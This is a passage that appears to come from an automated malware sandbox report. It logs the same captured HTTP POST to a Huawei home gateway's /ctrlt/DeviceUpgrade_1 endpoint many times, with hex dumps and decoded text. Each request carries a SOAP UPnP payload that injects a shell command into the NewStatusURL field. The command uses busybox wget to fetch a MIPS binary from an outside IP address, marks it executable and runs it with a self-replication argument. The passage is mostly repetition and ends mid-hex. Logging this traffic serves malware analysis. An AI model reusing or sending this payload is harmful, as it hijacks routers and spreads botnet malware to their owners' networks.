4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 